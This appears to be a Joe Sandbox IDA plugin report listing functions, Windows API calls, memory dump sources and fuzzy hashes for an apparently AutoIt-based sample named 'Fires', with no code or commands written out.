Opcode Fuzzy Hash: 786228a95a7e4c14ddb7b7ea3c2ac86420cf9516686c53cbad2f51a35644a216
Instruction Fuzzy Hash: 8D917C71A00716ABDF208FA5DC48FAEBBB8EF45314F14855DF505AB284D770A985CBB0

Function 00DB1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00DB1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DB1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00DB1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DB1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DB1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DB1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DB1DEF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 11bee56bd6f841b456d29ec3fb042b41440e9f17202d51ff91b37bf391c83954
Instruction ID: 99b08a30444c69b17211a82aaf4a31c7fa0f160e63a9087af7c6e8651015a49a
Opcode Fuzzy Hash: 11bee56bd6f841b456d29ec3fb042b41440e9f17202d51ff91b37bf391c83954
Instruction Fuzzy Hash: 3D91AB79A00219EFDB019F94C8A5BFEBBB5FF05711F544029E942EB2A1D774A940CB70

Function 00DC43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DC43C8
CharUpperBuffW.USER32(?,?), ref: 00DC44D7
_wcslen.LIBCMT ref: 00DC44E7
VariantClear.OLEAUT32(?), ref: 00DC467C

Part of subcall function 00DB169E: VariantInit.OLEAUT32(00000000), ref: 00DB16DE
Part of subcall function 00DB169E: VariantCopy.OLEAUT32(?,?), ref: 00DB16E7
Part of subcall function 00DB169E: VariantClear.OLEAUT32(?), ref: 00DB16F3

Strings

AUTOIT.ERROR, xrefs: 00DC44DD, 00DC44E2
Incorrect Parameter format, xrefs: 00DC4403, 00DC45FE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 821e6b85d54e038990c1dffe18a3f7719fe62fbea25ce41580d39aeacd9cb9ff
Instruction ID: 394a64ef30746331f1049d1ec0bd51a83be4d04077c09a1996bfaeb77dae4e31
Opcode Fuzzy Hash: 821e6b85d54e038990c1dffe18a3f7719fe62fbea25ce41580d39aeacd9cb9ff
Instruction Fuzzy Hash: 19913975A083029FC714DF24C490A6AB7E5FF89714F14892DF88A97351DB31ED45CBA2

Function 00DC560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00DA08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?,?,00DA0C4E), ref: 00DA091B
Part of subcall function 00DA08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?), ref: 00DA0936
Part of subcall function 00DA08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?,?), ref: 00DA0944
Part of subcall function 00DA08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DA0831,80070057,?), ref: 00DA0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DC56AE
_wcslen.LIBCMT ref: 00DC57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DC582C
CoTaskMemFree.OLE32(?), ref: 00DC5837

Strings

NULL Pointer assignment, xrefs: 00DC5880, 00DC58AF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 6c1e8e496d944b5dd0f78958735ca0047710504a0b5f1df347bf3b8053cc733a
Instruction ID: 63a3e2d252682c556aabdae5c0628dd8236adb39733e7efa36e409f968db7687
Opcode Fuzzy Hash: 6c1e8e496d944b5dd0f78958735ca0047710504a0b5f1df347bf3b8053cc733a
Instruction Fuzzy Hash: 0991E571D00219AFDF10DFA4D881EEEB7B9EF08314F10456AE915A7291DB71AA84CFB0

Function 00DD2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00DD2C1F
GetMenuItemCount.USER32(00000000), ref: 00DD2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DD2C79
_wcslen.LIBCMT ref: 00DD2CAF
GetMenuItemID.USER32(?,?), ref: 00DD2CE9
GetSubMenu.USER32(?,?), ref: 00DD2CF7

Part of subcall function 00DA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA43AD
Part of subcall function 00DA4393: GetCurrentThreadId.KERNEL32 ref: 00DA43B4
Part of subcall function 00DA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DA2F00), ref: 00DA43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DD2D7F

Part of subcall function 00DAF292: Sleep.KERNEL32 ref: 00DAF30A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 80deebe660965a0cfd6754a74992cba4088fa097febc0022b78b825980ea594c
Instruction ID: ac8cad7a449ded65ce4923113e107c369d0661f9f569cf79195da0b2e22a8baa
Opcode Fuzzy Hash: 80deebe660965a0cfd6754a74992cba4088fa097febc0022b78b825980ea594c
Instruction Fuzzy Hash: E1718F75A00205AFCB10DF68C841AAEB7F5EF59310F15845AE856EB351DB34ED41CBB0

Function 00DAB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00DAB8C0
GetKeyboardState.USER32(?), ref: 00DAB8D5
SetKeyboardState.USER32(?), ref: 00DAB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00DAB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00DAB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00DAB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DAB9E7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 523f32ca27b88279e2fd34de0930cd3df11a1cb7747967f5aa47464f7f1edd3c
Instruction ID: 28637d40babea9ea16222a4dd9de548be9f22461af2d962c69a6ba540307f2d0
Opcode Fuzzy Hash: 523f32ca27b88279e2fd34de0930cd3df11a1cb7747967f5aa47464f7f1edd3c
Instruction Fuzzy Hash: BD51DFA05087D53EFB3242388855BBA7EA99B07724F0C848AE1D9458D3C3D8EDD6DB71

Function 00DAB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00DAB6E0
GetKeyboardState.USER32(?), ref: 00DAB6F5
SetKeyboardState.USER32(?), ref: 00DAB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DAB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DAB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DAB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DAB7FF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 77d8a17c1366790b54e858f8d09610bf22b691f9a99e34017e0aaa7bc998dfb6
Instruction ID: 78b27183d55b3aea4a454906290ecf9933c097fcc27ca35f113228aab0fd30d5
Opcode Fuzzy Hash: 77d8a17c1366790b54e858f8d09610bf22b691f9a99e34017e0aaa7bc998dfb6
Instruction Fuzzy Hash: F951D1A09087D53DFB3282348C55B76BEA9AB47714F0C848AE0D54A8D3D3D8EC96E771

Function 00D757A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00D75F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00D757E3
__fassign.LIBCMT ref: 00D7585E
__fassign.LIBCMT ref: 00D75879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00D7589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00D75F16,00000000,?,?,?,?,?,?,?,?,?,00D75F16,?), ref: 00D758BE
WriteFile.KERNEL32(?,?,00000001,00D75F16,00000000,?,?,?,?,?,?,?,?,?,00D75F16,?), ref: 00D758F7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e729efaf3e32990e03d50fd1304752440e7ade54f10da93ff1dde6ac215b4278
Instruction ID: 4a6115d67280dd8aec0120b8c341625a81cb267e3f453c3b778a5514ab6bad4d
Opcode Fuzzy Hash: e729efaf3e32990e03d50fd1304752440e7ade54f10da93ff1dde6ac215b4278
Instruction Fuzzy Hash: 21519271A00649DFDB10CFA8D845AEEBBF9EF08310F14815AE559E7291E7709941CF72

Function 00D63090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D630BB
___except_validate_context_record.LIBVCRUNTIME ref: 00D630C3
_ValidateLocalCookies.LIBCMT ref: 00D63151
__IsNonwritableInCurrentImage.LIBCMT ref: 00D6317C
_ValidateLocalCookies.LIBCMT ref: 00D631D1

Strings

csm, xrefs: 00D63166

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: be453f5d7e968fd676ca87b8d0860d2e4126e5cdb9bfd3c5a037d973ec2f7794
Instruction ID: 4d511b576ffce8192add7e327a3ee4a31538379f750d03fb077548b2fb4ab99a
Opcode Fuzzy Hash: be453f5d7e968fd676ca87b8d0860d2e4126e5cdb9bfd3c5a037d973ec2f7794
Instruction Fuzzy Hash: 9941A134A043089BCF10DF68CC85AAEBBB5EF46324F188155E819AB392D735DB55CBB1

Function 00DAD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DAD7CD,?), ref: 00DAE714

Part of subcall function 00DAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DAD7CD,?), ref: 00DAE72D

lstrcmpiW.KERNEL32(?,?), ref: 00DAD7F0
MoveFileW.KERNEL32(?,?), ref: 00DAD82A
_wcslen.LIBCMT ref: 00DAD8B0
_wcslen.LIBCMT ref: 00DAD8C6
SHFileOperationW.SHELL32(?), ref: 00DAD90C

Strings

\*.*, xrefs: 00DAD89E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 28cb756e8237ac32e71918ae4b14ac2427aac4f2b844105ad884c3ee5345f547
Instruction ID: eec7a94e53737fab0ecbedc08a2d67959c08d0407126c5e7feb0cdcc066542e8
Opcode Fuzzy Hash: 28cb756e8237ac32e71918ae4b14ac2427aac4f2b844105ad884c3ee5345f547
Instruction Fuzzy Hash: 424165719062189FDF12EFA4C985ADE77B9EF09340F0404E6A506EB141EB35A788CB30

Function 00DB42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00DB4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DB4367
TranslateMessage.USER32(?), ref: 00DB4390
DispatchMessageW.USER32(?), ref: 00DB439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DB43AB

Strings

(, xrefs: 00DB437D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (
API String ID: 2256411358-2063206799
Opcode ID: aab38c603c82eb1e6ecb0645d9af3f75a5f1a0d97e76198f8e318c03bf84ee8b
Instruction ID: 2e3f2b4ff83abe6f87d18aa026ee958dbf1a16ce0d1009d701741b62b0a6c940
Opcode Fuzzy Hash: aab38c603c82eb1e6ecb0645d9af3f75a5f1a0d97e76198f8e318c03bf84ee8b
Instruction Fuzzy Hash: E031B370984342DEEB29CF35DC48BF63BE8AB01304F0C856DD5A3D22A2E7A49459CB31

Function 00DD3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DD38B8
GetWindowLongW.USER32(?,000000F0), ref: 00DD38EB
GetWindowLongW.USER32(?,000000F0), ref: 00DD3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DD3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DD397C
GetWindowLongW.USER32(?,000000F0), ref: 00DD398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DD39A7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 74fdff7aa3d50b931b6eed88bd50005c865c9ac99ce96cd4be82689c0a0d4afe
Instruction ID: e5981f368a79b38ad6be89367d424c0bc122fcb1dbd26c7ec319969f9bbfec28
Opcode Fuzzy Hash: 74fdff7aa3d50b931b6eed88bd50005c865c9ac99ce96cd4be82689c0a0d4afe
Instruction Fuzzy Hash: 05314230705245AFDB218F59DC94FA437A1EB8A310F1801AAF601DB3B1CBB0AD48DB62

Function 00DA808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DA80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DA80F6
SysAllocString.OLEAUT32(00000000), ref: 00DA80F9
SysAllocString.OLEAUT32(?), ref: 00DA8117
SysFreeString.OLEAUT32(?), ref: 00DA8120
StringFromGUID2.OLE32(?,?,00000028), ref: 00DA8145
SysAllocString.OLEAUT32(?), ref: 00DA8153

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 624c7fe2a1d498029a387e6e6c424765c99fed084782f2605e39fc20a4d9d5b8
Instruction ID: a6442ac063e98090950e76d3b904e97efebe6dea8ba69afc9973fcc10d8ad24a
Opcode Fuzzy Hash: 624c7fe2a1d498029a387e6e6c424765c99fed084782f2605e39fc20a4d9d5b8
Instruction Fuzzy Hash: F6219272601319AF9F10DFA8CC88CBB77ADEB0A3607048426FD05DB290DA70EC469774

Function 00DA8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DA81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DA81CF
SysAllocString.OLEAUT32(00000000), ref: 00DA81D2
SysAllocString.OLEAUT32 ref: 00DA81F3
SysFreeString.OLEAUT32 ref: 00DA81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00DA8216
SysAllocString.OLEAUT32(?), ref: 00DA8224

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b22a585fbef6b9c7034e36c27a6cbaae405440f9d2bc6de42c819621ef19b639
Instruction ID: 71630700632d23fae453a79b9fd82c1da8037deb9c7dd88d906d1e123bb5d607
Opcode Fuzzy Hash: b22a585fbef6b9c7034e36c27a6cbaae405440f9d2bc6de42c819621ef19b639
Instruction Fuzzy Hash: BC216071601204BF9F109BA8DC89DBA77ECEB4A3607448126F905CB2A0EA74EC41DB74

Function 00DB0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00DB0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DB0ED5

Strings

nul, xrefs: 00DB0F0E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 57d62e3a7881e05c6efe388f28ee8f66d286cf52fd639900c1fb306cb3f8ea4c
Instruction ID: fc8a85869699841ee6657ef5207a9918c540fedac45df510dbc55c9b7060389b
Opcode Fuzzy Hash: 57d62e3a7881e05c6efe388f28ee8f66d286cf52fd639900c1fb306cb3f8ea4c
Instruction Fuzzy Hash: 2F212E70600309EBDB208F65D845AEB7FA9AF59720F244A59FCA6E72D0D770D940CB70

Function 00DB0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00DB0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DB0FA8

Strings

nul, xrefs: 00DB0FE0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d69a2498175bd16d3bf8364e8cfc3e9b35bcb3a107ba3864005efa392bc9ab59
Instruction ID: 76133f37b13081c5cb418f0ff3d2aa905633aed0b86bae877498ea05f2621897
Opcode Fuzzy Hash: d69a2498175bd16d3bf8364e8cfc3e9b35bcb3a107ba3864005efa392bc9ab59
Instruction Fuzzy Hash: 73215E75604346DBDB309F688C04ADA7BA8BF59724F240A19F8E2E32D4D770D990DB70

Function 00DD4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D478B1
Part of subcall function 00D47873: GetStockObject.GDI32(00000011), ref: 00D478C5
Part of subcall function 00D47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D478CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DD4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DD4BBD
